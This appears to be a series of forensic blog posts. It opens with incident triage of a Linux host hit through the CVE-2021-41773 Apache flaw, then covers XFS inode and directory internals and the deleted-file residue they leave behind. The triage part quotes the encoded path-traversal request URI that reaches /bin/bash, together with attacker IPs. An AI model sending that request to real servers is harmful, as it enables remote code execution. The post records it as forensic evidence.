The request URI is typical of the CVE-2021-41773 RCE. We see the IP address and port used by the requestor– probably a VPN tunnel endpoint or Tor node and not the attacker’s actual IP address. We also have a user agent string which indicates that this was likely a scripted attack– curl is a command-line web client. The directories referenced in environment variables tie back to the deleted /var/tmp/.log/101068/.spoollog directory that was the CWD of these processes. So these are definitely worth digging deeper into in a future blog post.

There are two different, but very similar process hierarchies starting on Nov 30. Bash process 15851 starts sh process 15853 which runs sleep process 6830. Similarly, bash process 21783 starts shell process 21785 which runs sleep process 6803. The environ.txt files for these processes are nearly identical. PID 15851 was triggered from IP 5.2.72.226:47374, while PID 21783 was started by a request from 104.244.76.13:36748. All the other data is the same, so likely the same exploit was used–possibly by the same attacker:

HTTP_USER_AGENT=curl/7.79.1
REQUEST_METHOD=POST
REQUEST_URI=/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash
SCRIPT_NAME=/cgi-bin/../../../../../../../bin/bash

That leaves our mysterious agettyd process from Dec 5. Using the “running_processes_full_paths.txt” data dumped by UAC, you can see this process is running from the deleted /tmp/agettyd binary, which is very abnormal. But when we look at the “environ.txt” data, it’s easy to see that this process is related to the PID 15851 process hierarchy from Nov 30.

REMOTE_ADDR=5.2.72.226
REMOTE_PORT=47374
HTTP_USER_AGENT=curl/7.79.1

REQUEST_METHOD=POST
REQUEST_URI=/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash
SCRIPT_NAME=/cgi-bin/../../../../../../../bin/bash

IP address, port, user agent, and all of the details of the request match perfectly with the information related to PID 15851. Clearly we will need to drill into this in more detail in a future blog post.

Coming Soon

Based on the triage I’ve done so far, my investigation has three main threads:

  1. Where did /var/tmp/dk86 come from and what is it? (analysis in Part Two)
  2. What is the origin of the processes running from the deleted /var/tmp/.log/101068/.spoollog directory, and how did that directory end up getting deleted? (analysis in Part Three)
  3. Can we tell whether the requests from 5.2.72.226 and 104.244.76.13 came from independent actors or from the same attacker using multiple IPs? How did the /tmp/agettyd process get created? (analysis in Part Four)

We’ll investigate these questions more deeply in upcoming blog posts.

XFS (Part 5) – Multi-Block Directories

Life gets more interesting when directories get large enough to occupy multiple blocks. Let’s take a look at my /etc directory:

[root@localhost hal]# ls -lid /etc
67146849 drwxr-xr-x. 141 root root 8192 May 26 20:37 /etc

The file size is 8192 bytes, or two 4K blocks.

Now we’ll use xfs_db to get more information:

xfs_db> inode 67146849
xfs_db> print
[...]
core.size = 8192
core.nblocks = 3
core.extsize = 0
core.nextents = 3
[...]
u3.bmx[0-2] = [startoff,startblock,blockcount,extentflag] 
0:[0,8393423,1,0] 
1:[1,8397532,1,0] 
2:[8388608,8394766,1,0]
[...]

I’ve removed much of the output here to make things more readable. The directory file is fragmented, requiring multiple single-block extents, which is common for directories in XFS. The directory starts life as a single block. Eventually enough files are added that one block can no longer hold all the entries. But by that time, the blocks immediately following the original directory block have usually been consumed– often by the files which make up the content of the directory. So when the directory needs to grow, it typically has to fragment.

What is really interesting about multi-block directories in XFS is that they are sparse files. Looking at the list of extents at the end of the xfs_db output, we see that the first two blocks are at logical block offsets 0 and 1, but the third block is at logical block offset 8388608. What the heck is going on here?

If you recall from our discussion of block directories in the last installment, XFS directories have a hash lookup table at the end for faster searching. When a directory consumes multiple blocks, the hash lookup table and “tail record” move into their own block. For consistency, XFS places this information at logical offset XFS_DIR2_LEAF_OFFSET, which is currently set to 32GB. 32GB divided by our 4K block size gives a logical block offset of 8388608.
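
Here’s a quick sanity check of that arithmetic in Python (assuming the 4K block size used on this file system):

XFS_DIR2_LEAF_OFFSET = 32 * 2**30       # 32GB, per the XFS sources
BLOCK_SIZE = 4096

print(XFS_DIR2_LEAF_OFFSET // BLOCK_SIZE)   # 8388608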

From a file size perspective, we can see that xfs_db agrees with our earlier ls output, saying the directory is 8192 bytes. However, the xfs_db output clearly shows that the directory consumes three blocks, which should give it a file size of 3*4096 = 12288 bytes. Based on my testing, the directory “size” in XFS only counts the blocks that contain directory entries.

We can use xfs_db to examine the directory data blocks in more detail:

xfs_db> addr u3.bmx[0].startblock
xfs_db> print
dhdr.hdr.magic = 0x58444433 ("XDD3")
dhdr.hdr.crc = 0xe3a7892d (correct)
dhdr.hdr.bno = 38872696
dhdr.hdr.lsn = 0x2200007442
dhdr.hdr.uuid = e56c3b41-ca03-4b41-b15c-dd609cb7da71
dhdr.hdr.owner = 67146849
dhdr.bestfree[0].offset = 0x220
dhdr.bestfree[0].length = 0x8
dhdr.bestfree[1].offset = 0x258
dhdr.bestfree[1].length = 0x8
dhdr.bestfree[2].offset = 0x368
dhdr.bestfree[2].length = 0x8
du[0].inumber = 67146849
du[0].namelen = 1
du[0].name = "."
du[0].filetype = 2
du[0].tag = 0x40
du[1].inumber = 64
du[1].namelen = 2
du[1].name = ".."
du[1].filetype = 2
du[1].tag = 0x50
du[2].inumber = 34100330
du[2].namelen = 5
du[2].name = "fstab"
du[2].filetype = 1
du[2].tag = 0x60
du[3].inumber = 67146851
du[3].namelen = 8
du[3].name = "crypttab"
[...]

I’m using the addr command in xfs_db to select the startblock value from the first extent in the array (the zero element of the array).

The beginning of this first data block is nearly identical to the block directories we looked at previously. The only difference is that single block directories have a magic number “XDB3”, while data blocks in multi-block directories use “XDD3” as we see here. Remember that the value xfs_db labels dhdr.hdr.bno is actually the sector offset of this block and not the block number.

Let’s look at the next data block:

xfs_db> inode 67146849
xfs_db> addr u3.bmx[1].startblock
xfs_db> print
dhdr.hdr.magic = 0x58444433 ("XDD3")
dhdr.hdr.crc = 0xa0dba9dc (correct)
dhdr.hdr.bno = 38905568
dhdr.hdr.lsn = 0x2200007442
dhdr.hdr.uuid = e56c3b41-ca03-4b41-b15c-dd609cb7da71
dhdr.hdr.owner = 67146849
dhdr.bestfree[0].offset = 0xad8
dhdr.bestfree[0].length = 0x20
dhdr.bestfree[1].offset = 0xc18
dhdr.bestfree[1].length = 0x20
dhdr.bestfree[2].offset = 0xd78
dhdr.bestfree[2].length = 0x20
du[0].inumber = 67637117
du[0].namelen = 10
du[0].name = "machine-id"
du[0].filetype = 1
du[0].tag = 0x40
du[1].inumber = 67146855
du[1].namelen = 9
du[1].name = "localtime"
[...]

Again we see the same header information. Note that each data block has its own “free space” array, tracking available space in that data block.

Finally, we have the block containing the hash lookup table and tail record. We could use xfs_db to decode this block, but it turns out that there are some interesting internal structures to see here. Here’s the hex editor view of the start of the block:

Extent Directory Tail Block:

0-3     Forward link                        0
4-7     Backward link                       0
8-9     Magic number                        0x3df1
10-11   Padding                             zeroed
12-15   CRC32                               0xef654461

16-23   Sector offset                       38883440
24-31   Log seq number last update          0x2200008720
32-47   UUID                                e56c3b41-...-dd609cb7da71
48-55   Inode number                        67146849

56-57   Number of entries                   0x0126 = 294
58-59   Unused entries                      1
60-63   Padding for alignment               zeroed

The “forward” and “backward” links would come into play if this were a multi-node B+Tree data structure rather than a single block. Unlike previous magic number values, the magic value here (0x3df1) does not correspond to printable ASCII characters.

After the typical XFS header information, there is a two-byte value tracking the number of entries in the directory, and therefore the number of entries in the hash lookup table that follows. The next two bytes tell us that there is one unused entry– typically a record for a deleted file.

We find this unused record near the end of the hash lookup array. The entry starting at block offset 0x840 has an offset value of zero, indicating the entry is unused:

Extent Directory Tail block 0x820

Interestingly, right after the end of the hash lookup array, we see what appears to be the extended attribute information from an inode. This is apparently residual data left over from an earlier use of the block.

At the end of the block is data which tracks free space in the directory:

Extent Directory Tail Block 0xFFF

The last four bytes in the block are the number of blocks containing directory entries– two in this case. Preceding those four bytes is a “best free” array that tracks the length of the largest chunk of free space in each block. You will notice that the array values here correspond to the dhdr.bestfree[0].length values for each block in the xfs_db output above. When new directory entries are added, this array helps the file system locate the best spot to place the new entry.

We see the two bytes immediately before the “best free” array are identical to the first entry in the array. Did the /etc directory once consume three blocks and later shrink back to two? Based on limited testing, this appears to be the case. Unlike directories in traditional Unix file systems, which never shrink once blocks have been allocated, XFS directories will grow and shrink dynamically as needed.

So far we’ve looked at the three most common directory types in XFS: small “short form” directories stored in the inode, single block directories, and now multi-block directories tracked with an extent array in the inode. In rare cases, when the directory is very large and very fragmented, the extent array in the inode is insufficient. In these cases, XFS uses a B+Tree to track the extent information. We will examine this scenario in the next installment.

 

XFS (Part 4) – Block Directories

In the previous installment, we looked at small directories stored in “short form” in the inode. While these small directories can make up as much as 90% of the total directories in a typical Linux file system, eventually directories get big enough that they can no longer be packed into the inode data fork. When this happens, directory data moves out to blocks on disk.

In the inode, the data fork type (byte 5) changes to indicate that the data is no longer stored within the inode. Extents are used to track the location of the disk blocks containing the directory data. Here is the inode core and extent list for a directory that only occupies a single block:

Inode detail for directory occupying a single block

The data fork type is 2, indicating an extent list follows the inode core. Bytes 76-79 indicate that there is only a single extent. The extent starts at byte 176 (0x0B0), immediately after the inode core. The last 21 bits of the extent structure show that the extent only contains a single block. Parsing the rest of the extent yields a block address of 0x8118e7, or relative block 71911 in AG 2.

We can extract this block and examine it in our hex editor. Here is the data in the beginning of the block:

Block Directory Header and Entries

The directory block begins with a 48 byte header:

0-3      Magic number                       XDB3
4-7      CRC32 checksum                     0xaf6a416d
8-15     Sector offset of this block        39409464

16-23    Last LSN update                    0x20000061fe
24-39    UUID                               e56c3b41-...-dd609cb7da71
40-47    inode that points to this block    0x0408e66d

You may compare the UUID and inode values in the directory block header with the corresponding values in the inode to see that they match.

The XFS documentation describes the sector offset field as the “block number”. However, using the formula from Part 1 of this series, we can calculate the physical block number of this block as:

(AG number) * (blocks per AG) + (relative block offset)
     2      *    2427136      +         71911   =   4926183

Multiply the block offset 4926183 by 8 sectors per block to get the sector offset value 39409464 that we see in the directory block header.
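
If you find yourself doing this conversion often, it’s easy to script. Here’s a small Python sketch using this file system’s geometry (2,427,136 blocks per AG, 8 sectors per 4K block); the function name is my own:

def fsblock_to_sector(agno, agblock, blocks_per_ag=2427136, sectors_per_block=8):
    """Convert an AG-relative block address to an absolute sector offset."""
    return (agno * blocks_per_ag + agblock) * sectors_per_block

print(fsblock_to_sector(2, 71911))   # 39409464, matching the header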

Following the header is a “free space” array that consumes 12 bytes, plus 4 bytes of padding to preserve 64-bit alignment. The free space array contains three elements which indicate where the three largest chunks of unused space are located in this directory block. Each element is a 2 byte offset and a 2 byte length field. The elements of the array are sorted in descending order by the length of each chunk.

In this directory block, there is only a single chunk of free space, starting at offset 1296 (0x0510) and having 2376 bytes (0x0948) of space. The other elements of the free space array are zeroed, indicating no other free space is available.

The directory entries start at byte 64 (0x040) and can be read sequentially like a typical Unix directory. However, XFS uses a hash-based lookup table, growing up from the bottom of the directory block, for more efficient searching:

Block Directory Tail Record and Hash Array

The last 8 bytes of the directory block are a “tail record” containing two 4 byte values: the number of directory entries (0x34 or 52) and the number of unused entries (zero). Immediately preceding the tail record will be an array of 8 byte records, one record per directory entry (52 records in this case). Each record contains a hash value computed from the file name, and the offset in the directory block where the directory entry for that file is located. The array is sorted by hash value so that binary search can quickly find the desired record. The offsets are in 8 byte units.

The xfs_db program can compute hash values for us:

xfs_db> hash 03_smallfile
0x3f07fdec

If we locate this hash value in the array, we see the byte offset value is 0x12 or 18. Since the offset units are 8 bytes, this translates to byte offset 144 (0x090) from the start of the directory block.
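
You can also reproduce the hash outside of xfs_db. The sketch below is my Python translation of the xfs_da_hashname() routine as I read it in the kernel sources– treat it as an approximation, though it does reproduce the value above:

def rol32(x, n):
    # Rotate a 32-bit value left by n bits
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def xfs_da_hashname(name):
    b = name.encode()
    h = 0
    while len(b) >= 4:       # hash four characters at a time
        h = (b[0] << 21) ^ (b[1] << 14) ^ (b[2] << 7) ^ b[3] ^ rol32(h, 28)
        b = b[4:]
    if len(b) == 3:
        h = (b[0] << 14) ^ (b[1] << 7) ^ b[2] ^ rol32(h, 21)
    elif len(b) == 2:
        h = (b[0] << 7) ^ b[1] ^ rol32(h, 14)
    elif len(b) == 1:
        h = b[0] ^ rol32(h, 7)
    return h

print(hex(xfs_da_hashname("03_smallfile")))   # 0x3f07fdec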

Here are the first six directory entries from this block, including the entry for “03_smallfile”:

Directory Entry Detail

Directory entries are variable length, but always 8 byte (64-bit) aligned. The fields in each directory entry are:

     Len (bytes)       Field
     ===========       =====
          8            Inode number
          1            File name length
          varies       File name
          1            File type
          varies       Padding for alignment
          2            Byte offset of this directory entry

64-bit inode addresses are always used. This is different from “short form” directories, where 32-bit inode addresses will be used if possible.

File name length is a single byte, limiting file names to 255 characters. The file type byte uses the same numbering scheme we saw in “short form” directories:

    1   Regular file
    2   Directory
    3   Character special device
    4   Block special device
    5   FIFO
    6   Socket
    7   Symlink

Padding for alignment is only included if necessary. Our “03_smallfile” entry starting at offset 0x090 is exactly 24 bytes long and needs no padding for alignment. You can clearly see the padding in the “.” and “..” entries starting at offset 0x040 and 0x050 respectively.
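
To make the layout concrete, here’s a Python sketch that walks the entries in a directory data block. The function name and defaults are mine– the end offset of 0x510 is simply where free space begins in this particular block, and the 0xFFFF unused-entry marker is described later in this post:

import struct

def walk_dirents(block, off=0x40, end=0x510):
    """Yield (offset, inode, name, ftype, tag) for each entry in a dir block."""
    while off < end:
        if struct.unpack_from(">H", block, off)[0] == 0xFFFF:
            # Unused entry: the next two bytes hold the free space length
            off += struct.unpack_from(">H", block, off + 2)[0]
            continue
        inumber = struct.unpack_from(">Q", block, off)[0]
        namelen = block[off + 8]
        name = block[off + 9 : off + 9 + namelen].decode("ascii", "replace")
        ftype = block[off + 9 + namelen]
        entlen = (8 + 1 + namelen + 1 + 2 + 7) & ~7   # round up to 8 bytes
        tag = struct.unpack_from(">H", block, off + entlen - 2)[0]
        yield off, inumber, name, ftype, tag
        off += entlen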

Deleting a File

If we remove “03_smallfile” from this directory, the inode updates similarly to what we saw with the “short form” directory in the last installment of this series. The mtime and ctime values are updated, as are the CRC32 and logfile sequence number fields. The file size does not change, since the directory still occupies one block.

The “tail record” and hash array at the end of the directory block change:

Tail record and hash array post delete

The tail record still shows 52 entries, but one of them is now unused. If we look at the entry for hash 0x3F07FDEC, we see the offset value has been zeroed, indicating an unused record.

We also see changes at the beginning of the block:

Directory entry detail post delete

The free space array now uses the second element, showing 24 (0x18) bytes free at byte offset 0x90– the location where the “03_smallfile” entry used to reside.

Looking at offset 0x90, we see that the first two bytes of the inode field are overwritten with 0xFFFF, indicating an unused entry. The next two bytes are the length of the free space. Again we see 0x18, or 24 bytes.

However, since inode addresses in this file system fit in 32 bits, the original inode address associated with this file is still clearly visible. The rest of the original directory entry is untouched until a new entry overwrites this space. This should make file recovery easier.

Not Quite Done With Directories

When directories get large enough to occupy multiple blocks, the directory structure gets more complicated. We’ll examine larger directories in our next installment.

XFS (Part 3) – Short Form Directories

XFS uses several different directory structures depending on the size of the directory. For testing purposes, I created three directories– one with 5 files, one with 50, and one with 5000 file entries. Small directories have their data stored in the inode. In this installment we’ll examine the inode of the directory that contains only five files.

XFS Inode with Short Form Directory

We documented the “inode core” layout and the format of the extended attributes in Part 2 of this series. In this inode the file type (upper nibble of byte 2) is 4, which means it’s a directory. The data fork type (byte 5) is 1, meaning resident data.

Resident directory data is stored as a “short form” directory structure starting at byte offset 176, right after the inode core. First we have a brief header:

176      Number of directory entries                   5
177      Number of dir entries needing 64-bit inodes   0
178-181  Inode of parent                               0x04159fa1

First we have a byte tracking the number of directory entries that follow the header. The next byte tracks how many directory entries require 64 bits for inode data. As we saw in Part 1 of this series, XFS uses variable length addresses for blocks and inodes. In our file system, we need less than 32 bits to store these addresses, so there are no directory entries requiring 64-bit inodes. This means the directory data will use 32 bits to store inodes in order to save space.

This has an immediate impact because the next entry in the header is the inode of the parent directory. Since byte 177 is zero, this field will be 32 bits. If byte 177 was non-zero, then all inode entries in the header and directory entries would be 64-bit.

The parent inode field in the header is the equivalent of the usual “..” link in the directory. The current directory inode (the “.” link) is found in the inode core in bytes 152-159. The short form directory simply uses these values and does not have explicit “.” and “..” entries.

After the header come a series of variable length directory entries, packed as tightly as possible with no alignment constraints. Entries are added to the directory in order of file creation and are not sorted in any way.

Here is a description of the fields and a breakdown of the values for the five directory entries in this inode:

      Len (Bytes)      Field
          1            Length of file name (in bytes)
          2            Entry offset in non short form directory
          varies       Characters in file name
          1            File type
          4 or 8       Absolute inode address

Len    Offset     Name            Type      Inode
===    ======     ====            ====      =====
12     0x0060     01_smallfile    01        0x0417979d
10     0x0078     02_bigfile      01        0x0417979e
12     0x0090     03_smallfile    01        0x0417979f
10     0x00a8     04_bigfile      01        0x0417a154
12     0x00c0     05_smallfile    01        0x0417a155

First we have a single byte for the file name length in bytes. Like other Unix file systems, there is a 255 character file name limit.

The next two bytes are based on the byte offset the directory entry would have if it were a normal XFS directory entry and not packed into a short form directory in the inode. In a normal directory block, directory entries are 64-bit aligned and start at byte offset 96 (0x60) following the directory header and “.” and “..” entries. The directory entries here are all 18 or 20 bytes long, which means they would consume 24 bytes (0x18) in a normal directory block. Using a consistent numbering scheme for the offset makes it easier to write code that iterates through directory entries, even though the offsets don’t match the actual offset of each directory entry in the short form style.

Next we have the characters in the file name followed by a single byte for the file type. The file type is included in the directory entry so that commands like “ls -F” don’t have to open each inode to get the file type information. The file type values in the directory entry do not use the same number scheme as the file type in the inode. Here are the expected values for directory entries:

    1   Regular file
    2   Directory
    3   Character special device
    4   Block special device
    5   FIFO
    6   Socket
    7   Symlink

Finally there is a field to hold the inode associated with the file name. In our example, these inode entries are 32 bits. 64-bit inode fields will be used if the directory header indicates they are needed.
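
Putting that all together, here’s a Python sketch that parses a short form directory from the inode data fork (the function name is mine):

import struct

def parse_shortform_dir(fork):
    """Parse short form directory data starting at inode offset 176."""
    count, i8count = fork[0], fork[1]
    fmt = ">Q" if i8count else ">I"      # 64- or 32-bit inode numbers
    isize = 8 if i8count else 4
    parent = struct.unpack_from(fmt, fork, 2)[0]
    off = 2 + isize
    entries = []
    for _ in range(count):
        namelen = fork[off]
        tag = struct.unpack_from(">H", fork, off + 1)[0]
        name = fork[off + 3 : off + 3 + namelen].decode()
        ftype = fork[off + 3 + namelen]
        inum = struct.unpack_from(fmt, fork, off + 4 + namelen)[0]
        entries.append((name, ftype, inum, tag))
        off += 4 + namelen + isize
    return parent, entries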

Deleting a File

When a file is deleted from (or added to) a directory, the mtime and ctime in the directory’s inode core are updated. The directory file size changes (bytes 56-63). The CRC32 checksum and the logfile sequence number fields are updated.

In the data fork, all directory entries after the deleted entry are shifted downwards, completely overwriting the deleted entry. Here’s what the directory entries look like after “03_smallfile”– the third entry in the original directory– is deleted:

Short form directory entry after file deleted

The four remaining directory entries are highlighted above. However, after those entries you can clearly see the residue of the entry for “05_smallfile” from the original directory. So as short-form directories shrink, they leave behind entries in the unused “inode slack”. In this case the residue is for a file entry that still exists in the directory, but it’s possible that we might get residue of entries deleted from the end of the directory list.

When Directories Grow Up

Another place you can see short form directory residue is when the directory gets large enough that it needs to move out to blocks on disk. I created a sample directory that initially had five files and confirmed that it was being stored as a short form directory in the inode. Then I added 45 more files to the directory, which made a short form directory impossible. Here’s what the first part of the inode looks like after these two operations:

Extent directory with short form residue

The data fork type (byte 5) is 2, meaning an extent list after the inode core, giving the location of the directory content on disk. You can see the extent highlighted starting at byte offset 176 (0xb0). But immediately after that extent you can see the residue of the original short-form directory.

The format of directories changes significantly when directory entries move out into disk blocks. In our next installment we will examine the structures in these larger directories.

XFS (Part 2) – Inodes

Part 1 of this series was a quick introduction to XFS, the XFS superblock, and the unique Allocation Group (AG) based addressing scheme used in the file system. With this information, we were able to extract an inode from its physical location on disk.

In this installment, we will look at the structure of the XFS inode. Since we will want to see what remains in the inode after a file is deleted, I’m going to create a small file for testing purposes:

[root@localhost ~]# echo This is a small file >testfile
[root@localhost ~]# ls -i testfile
100799719 testfile

To save time, we’ll use the xfs_db program to convert that inode address into the values we need to extract the inode from its physical location on disk. Then we’ll use dd to extract the inode as we did in Part 1.

[root@localhost ~]# xfs_db -r /dev/mapper/centos-root
xfs_db> convert inode 100799719 agno 
0x3 (3)
xfs_db> convert inode 100799719 agblock
0x429c (17052)
xfs_db> convert inode 100799719 offset
0x7 (7)
xfs_db> ^D
[root@localhost ~]# dd if=/dev/mapper/centos-root bs=4096 \
                         skip=$((3*2427136 + 17052)) count=1 | 
                    dd bs=512 skip=7 count=1 >/home/hal/testfile-inode
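
The conversions xfs_db is doing here are just bit shifts driven by the log2 values in the superblock. Here’s a Python sketch using this file system’s values (22-bit AG-relative block addresses, 8 inodes per block); the function name is mine:

def split_inode_number(ino, agblklog=22, inopblog=3):
    """Split an absolute inode number into (AG number, AG block, offset)."""
    agno = ino >> (agblklog + inopblog)
    rel = ino & ((1 << (agblklog + inopblog)) - 1)
    return agno, rel >> inopblog, rel & ((1 << inopblog) - 1)

print(split_inode_number(100799719))   # (3, 17052, 7)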

Looking at the Inode

We can now view the inode in our trusty hex editor:

XFS Inode with Extent Array

XFS v5 inodes start with a 176 byte “inode core” structure:

0-1      Magic number                              "IN"
2-3      File type and mode bits (see below)       1000 000 110 100 100
4        Version (v5 file system uses v3 inodes)   3
5        Data fork type flag (see below)           2
6-7      v1 inode numlinks field (not used in v3)  zeroed
8-11     File owner UID                            0 (root)
12-15    File GID                                  0 (root)

16-19    v2+ number of links                       1
20-21    Project ID (low)                          0
22-23    Project ID (high)                         0
24-29    Padding (must be zero)                    0
30-31    Increment on flush                        0

32-35    atime epoch seconds                       0x5afdd6cd
36-39    atime nanoseconds                         0x2467330e
40-43    mtime epoch seconds                       0x5afdd6cd
44-47    mtime nanoseconds                         0x24767568

48-51    ctime epoch seconds                       0x5afdd6cd
52-55    ctime nanoseconds                         0x24767568
56-63    File (data fork) size                     0x15 = 21

64-71    Number of blocks in data fork             1
72-75    Extent size hint                          zeroed
76-79    Number of data extents used               1

80-81    Number of extended attribute extents      0
82       Inode offset to xattr (8 byte multiples)  0x23 = 35 * 8 = 280
83       Extended attribute type flag (see below)  1
84-87    DMAPI event mask                          0
88-89    DMAPI state                               0
90-91    Flags                                     0 (none set)
92-95    Generation number                         0xa3fd42cd

96-99    Next unlinked ptr (if inode unlinked)    -1 (NULL in XFS)

/* v3 inodes (v5 file system) have the following fields */
100-103  CRC32 checksum for inode                  0xb43f0d10
104-111  Number of changes to attributes           1

112-119  Log sequence number of last update        0x2100006185
120-127  Extended flags                            0 (none set)

128-131  Copy on write extent size hint            0
132-143  Padding for future use                    0

144-147  btime epoch seconds                       0x5afdd6cd
148-151  btime nanoseconds                         0x2467330e
152-159  inode number of this inode                0x60214e7 = 100799719

160-175  UUID                                      e56c3b41-...-dd609cb7da71

XFS inodes start with the 2 byte magic number value “IN”. Inodes also have a CRC32 checksum (bytes 100-103) to help detect corruption. The inode includes its own absolute inode number (bytes 152-159) and the file system UUID (bytes 160-175), which should match the UUID value from the superblock. Whenever the inode is updated, bytes 112-119 track the “logfile sequence number” (LSN) of the journal entry for the update. The inode format has changed across different versions of the XFS file system, so refer to the inode version in byte 4 before decoding the inode. XFS v5 uses v3 inodes.

The size of the file (in bytes) is a 64-bit value in bytes 56-63. The original XFS inode tracked the number of links as a 16-bit value (bytes 6-7), which is no longer used. Number of links is now tracked as a 32-bit value found in bytes 16-19.

Timestamps include both a 32-bit “Unix epoch” style seconds field and a 32-bit nanosecond resolution fractional seconds field. The three classic Unix timestamps– atime, mtime, ctime– are found in bytes 32-55 of the inode. File creation time (btime) was only added in XFS v5, so that timestamp resides in bytes 144-151 in the upper portion of the inode core.

File ownership and permissions are tracked as in earlier Unix file systems. There are 32-bit file owner (bytes 8-11) and group owner (bytes 12-15) fields. File type and permissions are stored in a packed 16-bit structure. The low 12 bits are the standard Unix permissions bits, and the upper four bits are used for the file type.

The file type nibble will be one of the following values:

   8   Regular file
   4   Directory
   2   Character special device
   6   Block special device
   1   FIFO
   C   Socket
   A   Symlink

The 12 permissions bits are grouped into four groups of 3 bits, and are often written in octal notation– in our case we have 0644. The first group of three represents the “special” bit flags: set-UID, set-GID, and “sticky” (none of these are set for our test file). The remaining three groups represent “read” (r), “write” (w), and “execute” (x) permissions for three categories. The first set of bits applies to the file owner, the second to members of the Unix group that owns the file, and the last to everybody else. The permissions on our test file are 644 or 110 100 100 aka rw-r--r--. In other words, read and write access for the file owner, and read only access for group members and for all other users on the system.
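
Decoding the packed value is simple once you know the split. Here’s a quick Python illustration using our test file’s value (the 16 bits shown above work out to 0x81A4):

def decode_mode(mode):
    # Upper nibble is the file type, low 12 bits are the permissions
    return mode >> 12, oct(mode & 0o7777)

print(decode_mode(0x81A4))   # (8, '0o644') -- regular file, rw-r--r--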

The remaining space after the 176 bytes of inode core is used to track the data blocks associated with the file (the “data fork” of the file) and any extended attributes that may be set. There are multiple ways in which data and attributes may be stored– locally resident within the inode, in a series of extents, or in a more complex B+Tree indexed structure. The data fork type flag in byte 5 and the extended attribute type flag in byte 83 document how this information is organized. The possible values for these fields are:

   0   Special device file (data type only)
   1   Data is resident ("local") in the inode
   2   Array of extent structures follows
   3   B+Tree root follows

Currently XFS only uses resident or “local” storage for extended attributes and small directories. There is a proposal to allow small files to be stored in the inode (similar to NTFS), but this is still under development. The data fork for our small test file is type 2– an array of extent structures. The extended attributes are type 1, meaning they are stored locally in the inode.

The data fork starts at byte 176, immediately after the inode core. The start of the extended attribute data is found at an offset from the end of the inode core. This offset is byte 82 of the inode core, and the units are multiples of 8 bytes. In our sample inode, the offset value is 0x23 or 35. Multiplying by 8 gives a byte offset of 280 from the end of the inode core, or 176+280=456 bytes from the beginning of the inode.

Extent Arrays

The most common storage option for file content in XFS is data fork type 2– an array of 16 byte extent structures starting immediately after the inode core. Bytes 76-79 indicate how many extent structures are in the array. Our file is not fragmented, so there is only a single extent structure in the inode.

Theoretically, the 336 bytes following the inode core could hold 21 extent structures, assuming no extended attribute data. If the inode cannot hold all of the extent information (an extremely fragmented file), then the data fork in the inode becomes the root of a B+Tree (data fork type 3) for tracking extent information. We will see an example of this in a later installment in this series.

The challenging thing about XFS extent structures is that they are not byte aligned. They contain four fields as follows:

  • Flag (1 bit) – Set if extent is preallocated but not yet written, zero otherwise
  • Logical offset (54 bits) – Logical offset from the start of the file
  • Starting block (52 bits) – Absolute block address of the start of the extent
  • Length (21 bits) – Number of blocks in the extent

If you think this makes manually decoding XFS extent information challenging, you’d be correct. Let’s break the extent structure down into individual bits in order to make decoding a bit easier. The extent starts at byte offset 176 (0xb0), and I’ll use a little command-line magic to see the bits:

[root@localhost ~]# xxd -b -c 4 /home/hal/testfile-inode | 
                       grep -A3 0b0:
00000b0: 00000000 00000000 00000000 00000000  ....
00000b4: 00000000 00000000 00000000 00000000  ....
00000b8: 00000000 00000000 00011000 00001000  ....
00000bc: 00001111 00100000 00000000 00000001  . ..

Flag bit (1 bit): 0
logical offset (54 bits): 0
absolute start block (52 bits): 
    0 00000000 00000000 00000000 00011000 00001000 00001111 001

    0000 0000 0000 0000 0000 0000 0000 1100 0000 0100 0000 0111 1001
      0    0    0    0    0    0    0    C    0    4    0    7    9

    block 0xC04079 aka relative block 0x4079 (16505) in AG 3

block count (21 bits): 1

Let’s check and see if we decoded the structure correctly:

[root@localhost ~]# dd if=/dev/mapper/centos-root bs=4096 
                       skip=$((3*2427136 + 16505)) count=1 | xxd
0000000: 5468 6973 2069 7320 6120 736d 616c 6c20  This is a small 
0000010: 6669 6c65 0a00 0000 0000 0000 0000 0000  file............
0000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000030: 0000 0000 0000 0000 0000 0000 0000 0000  ................
[... all zeroes to end ...]

Looks like we got it right. Note that XFS null fills file slack space, which is typical for Unix file systems.
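
Hand-decoding these bit fields gets old quickly, so here’s a Python sketch that unpacks a 16 byte extent record (verified against the extent above; the AG split assumes this file system’s 22-bit relative block addresses):

import struct

def decode_extent(rec, agblklog=22):
    """Unpack one 128-bit, big endian XFS extent record."""
    hi, lo = struct.unpack(">QQ", rec)
    flag = hi >> 63                                   # 1-bit preallocated flag
    logical = (hi >> 9) & ((1 << 54) - 1)             # 54-bit logical offset
    startblock = ((hi & 0x1FF) << 43) | (lo >> 21)    # 52-bit absolute block
    count = lo & ((1 << 21) - 1)                      # 21-bit block count
    agno, agblock = startblock >> agblklog, startblock & ((1 << agblklog) - 1)
    return flag, logical, agno, agblock, count

rec = bytes.fromhex("0000000000000000000018080f200001")
print(decode_extent(rec))   # (0, 0, 3, 16505, 1)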

Extended Attributes

XFS allows arbitrary extended attributes to be added to the file. Attributes are simply name, value pairs. There is a 255 byte limit on the size of any attribute name or value. You can set or view attributes from the command line with the “attr” command.

If the amount of attribute data is small, extended attributes will be stored in the inode, just as they are in our sample file. Large amounts of attribute information may need to be stored in data blocks on disk, in which case the attribute data is tracked using extents just like the data fork.

As we discussed above, resident attribute information starts at a specific byte offset from the end of the inode core. In our sample file the offset is 280 bytes from the end of the inode core or 456 bytes (280 + 176) from the start of the inode.

Attributes start with a four byte header:

456-457  Length of attributes               0x34 = 52
458      Number of attributes to follow     1
459      Padding for alignment              0

The length field unit is bytes and includes the 4 byte header. Our sample file only contains a single attribute.

Each attribute structure is variable length, to allow attributes to be packed as tightly as possible. Each attribute structure starts with a single byte for the name length, then a byte for the value length, and a flag byte. The rest of the attribute structure is the name followed by the value, with no null terminators or padding for byte alignment.

Breaking down the single attribute we have in our sample inode, we see:

460      Length of name                     7
461      Length of value                    0x26 = 38
462      Flags                              4 
463-469  Attribute name                     selinux
470-507  Attribute value                    unconfined_u:...

